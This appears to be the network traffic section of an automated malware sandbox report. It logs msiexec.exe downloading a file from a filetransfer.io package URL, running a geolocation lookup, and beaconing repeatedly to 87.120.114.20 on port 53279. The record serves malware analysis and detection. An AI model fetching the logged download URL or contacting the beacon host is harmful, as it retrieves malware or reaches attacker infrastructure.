                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808515072 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808588982 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808604956 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808634043 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808685064 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808851004 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808851957 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.809001923 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.809045076 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.809056997 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.809067011 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.205127001 CET60796443192.168.11.203.163.101.92
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.205168009 CET443607963.163.101.92192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.205323935 CET60796443192.168.11.203.163.101.92
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.205482960 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.205558062 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.434423923 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.434690952 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.434875011 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.653723955 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.653999090 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.654071093 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.654172897 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.654324055 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.654472113 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.654850960 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.655021906 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.874193907 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.874228001 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.874452114 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.874625921 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.874777079 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.874828100 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.875158072 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.875329018 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.875974894 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:21.021939039 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:21.093122005 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:21.093153000 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:21.094010115 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:21.139890909 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:21.140131950 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:21.241727114 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:39.262335062 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:39.263475895 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:39.528090954 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:12:04.059324026 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:12:04.590425014 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:12:05.637056112 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:12:07.714757919 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:12:09.353590012 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:12:09.354613066 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:12:09.623002052 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:12:11.870111942 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:12:20.165117979 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:12:36.755192995 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:12:39.476783991 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:12:39.477890968 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:12:39.863922119 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:12:40.078583002 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:13:09.582952976 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:13:09.583816051 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:13:09.856478930 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:13:39.651913881 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:13:39.652951002 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:13:39.920813084 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:14:09.751725912 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:14:09.752612114 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:14:10.012875080 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:14:39.832190037 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:14:39.833031893 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:14:40.105933905 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:15:09.932645082 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:15:09.933567047 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:15:10.199439049 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:15:39.994465113 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:15:39.995440006 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:15:40.262300014 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:16:10.060484886 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:16:10.061391115 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:16:10.340580940 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:16:40.168036938 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:16:40.168972969 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:16:40.450577974 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:17:10.236399889 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:17:10.239237070 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:17:10.524674892 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:17:40.291028023 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:17:40.292437077 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:17:40.558952093 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:18:10.369585991 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:18:10.370625019 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:18:10.647305965 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:18:40.425657034 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:18:40.426621914 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:18:40.684221983 CET532794976987.120.114.20192.168.11.20

                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Nov 11, 2024 08:10:16.143857002 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:10:16.907589912 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:10:17.673199892 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:10:27.114509106 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:10:27.871025085 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:10:28.636352062 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:10:49.227427006 CET5055453192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:10:49.347805977 CET53505541.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:50.435508013 CET5419853192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:10:50.556304932 CET53541981.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.177259922 CET6333953192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.299335957 CET53633391.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:03.101881981 CET53517981.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:03.109420061 CET53640351.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:03.211621046 CET570961900192.168.11.20239.255.255.250
                                                                                                                                                                                                        Nov 11, 2024 08:11:03.317631960 CET53570951.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.074681997 CET5742053192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.074762106 CET5167353192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.192795038 CET53574201.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.193665981 CET53516731.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.221288919 CET570961900192.168.11.20239.255.255.250
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.222311974 CET570961900192.168.11.20239.255.255.250
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.487760067 CET53546461.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:06.268606901 CET570961900192.168.11.20239.255.255.250
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.424408913 CET5198053192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.460390091 CET590591900192.168.11.20239.255.255.250
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.775609970 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.460536957 CET590591900192.168.11.20239.255.255.250
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.539550066 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.068315029 CET5291753192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.076397896 CET5446753192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.198864937 CET53529171.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.203205109 CET5712553192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.203520060 CET6233653192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.295164108 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.462002993 CET590591900192.168.11.20239.255.255.250
                                                                                                                                                                                                        Nov 11, 2024 08:11:15.462392092 CET590591900192.168.11.20239.255.255.250
                                                                                                                                                                                                        Nov 11, 2024 08:11:16.373864889 CET5469153192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.167675018 CET5814953192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.167675018 CET5118453192.168.11.201.1.1.1
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.285895109 CET53581491.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.286003113 CET53511841.1.1.1192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.230648041 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.230691910 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.230691910 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.947175980 CET51245443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.995222092 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.995261908 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:19.995261908 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.067262888 CET44351245172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.067397118 CET44351245172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.067549944 CET44351245172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.068023920 CET51245443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.204950094 CET51245443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.756357908 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.756357908 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:11:20.756402016 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                        Nov 11, 2024 08:13:53.789635897 CET138138192.168.11.20192.168.11.255

                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Nov 11, 2024 08:10:49.227427006 CET192.168.11.201.1.1.10x8085Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:10:50.435508013 CET192.168.11.201.1.1.10x76cbStandard query (0)s20.filetransfer.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.177259922 CET192.168.11.201.1.1.10xc557Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.074681997 CET192.168.11.201.1.1.10x507cStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.074762106 CET192.168.11.201.1.1.10x973dStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.424408913 CET192.168.11.201.1.1.10xa88dStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.068315029 CET192.168.11.201.1.1.10x542cStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.076397896 CET192.168.11.201.1.1.10x3d70Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.203205109 CET192.168.11.201.1.1.10xf4e2Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.203520060 CET192.168.11.201.1.1.10xa0e4Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:16.373864889 CET192.168.11.201.1.1.10x8646Standard query (0)deff.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.167675018 CET192.168.11.201.1.1.10xd3feStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.167675018 CET192.168.11.201.1.1.10x6798Standard query (0)dns.quad9.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Nov 11, 2024 08:10:49.347805977 CET1.1.1.1192.168.11.200x8085No error (0)filetransfer.io104.21.13.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:10:49.347805977 CET1.1.1.1192.168.11.200x8085No error (0)filetransfer.io172.67.200.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:10:50.556304932 CET1.1.1.1192.168.11.200x76cbNo error (0)s20.filetransfer.io172.67.200.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:10:50.556304932 CET1.1.1.1192.168.11.200x76cbNo error (0)s20.filetransfer.io104.21.13.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.299335957 CET1.1.1.1192.168.11.200xc557No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.192795038 CET1.1.1.1192.168.11.200x507cNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.192795038 CET1.1.1.1192.168.11.200x507cNo error (0)googlehosted.l.googleusercontent.com172.217.215.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.193665981 CET1.1.1.1192.168.11.200x973dNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.541825056 CET1.1.1.1192.168.11.200xd2b2No error (0)svc.ha-teams.office.comsvc.ms-acdc-teams.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.541825056 CET1.1.1.1192.168.11.200xd2b2No error (0)svc.ms-acdc-teams.office.com52.123.251.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.541825056 CET1.1.1.1192.168.11.200xd2b2No error (0)svc.ms-acdc-teams.office.com52.123.247.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.541825056 CET1.1.1.1192.168.11.200xd2b2No error (0)svc.ms-acdc-teams.office.com52.123.251.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.541825056 CET1.1.1.1192.168.11.200xd2b2No error (0)svc.ms-acdc-teams.office.com52.123.251.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.542495966 CET1.1.1.1192.168.11.200xa88dNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.198864937 CET1.1.1.1192.168.11.200x542cNo error (0)sb.scorecardresearch.com3.163.101.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.198864937 CET1.1.1.1192.168.11.200x542cNo error (0)sb.scorecardresearch.com3.163.101.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.198864937 CET1.1.1.1192.168.11.200x542cNo error (0)sb.scorecardresearch.com3.163.101.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.198864937 CET1.1.1.1192.168.11.200x542cNo error (0)sb.scorecardresearch.com3.163.101.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.198895931 CET1.1.1.1192.168.11.200x3d70No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.333750010 CET1.1.1.1192.168.11.200xf4e2No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.333769083 CET1.1.1.1192.168.11.200xa0e4No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:16.492925882 CET1.1.1.1192.168.11.200x8646No error (0)deff.nelreports.netdeff.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.285895109 CET1.1.1.1192.168.11.200xd3feNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.285895109 CET1.1.1.1192.168.11.200xd3feNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.286003113 CET1.1.1.1192.168.11.200x6798No error (0)dns.quad9.net149.112.112.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.286003113 CET1.1.1.1192.168.11.200x6798No error (0)dns.quad9.net9.9.9.9A (IP address)IN (0x0001)false

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • filetransfer.io
                                                                                                                                                                                                        • s20.filetransfer.io
                                                                                                                                                                                                        • clients2.googleusercontent.com
                                                                                                                                                                                                        • login.live.com
                                                                                                                                                                                                        • config.edge.skype.com
                                                                                                                                                                                                        • dns.quad9.net
                                                                                                                                                                                                        • chrome.cloudflare-dns.com
                                                                                                                                                                                                        • geoplugin.net

                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.11.2049773178.237.33.50805024C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.510555983 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                        Host: geoplugin.net
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.725507975 CET1170INHTTP/1.1 200 OK
                                                                                                                                                                                                        date: Mon, 11 Nov 2024 07:10:56 GMT
                                                                                                                                                                                                        server: Apache
                                                                                                                                                                                                        content-length: 962
                                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                                        cache-control: public, max-age=300
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 39 2e 31 38 37 2e 31 37 31 2e 31 33 37 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: { "geoplugin_request":"89.187.171.137", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Atlanta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"33.7485", "geoplugin_longitude":"-84.3871", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.11.2049767104.21.13.1394435024C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:10:49 UTC190OUTGET /data-package/kpFdlS7h/download HTTP/1.1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                        Host: filetransfer.io
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        2024-11-11 07:10:50 UTC1241INHTTP/1.1 302 Found
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:10:50 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        X-Powered-By: Nette Framework 3
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=cavpeluj70i7r0fo9pbtami48v; expires=Mon, 25-Nov-2024 07:10:50 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Vary: X-Requested-With
                                                                                                                                                                                                        Location: https://s20.filetransfer.io/storage/download/DSOnK3w83O1d
                                                                                                                                                                                                        cf-cache-status: DYNAMIC
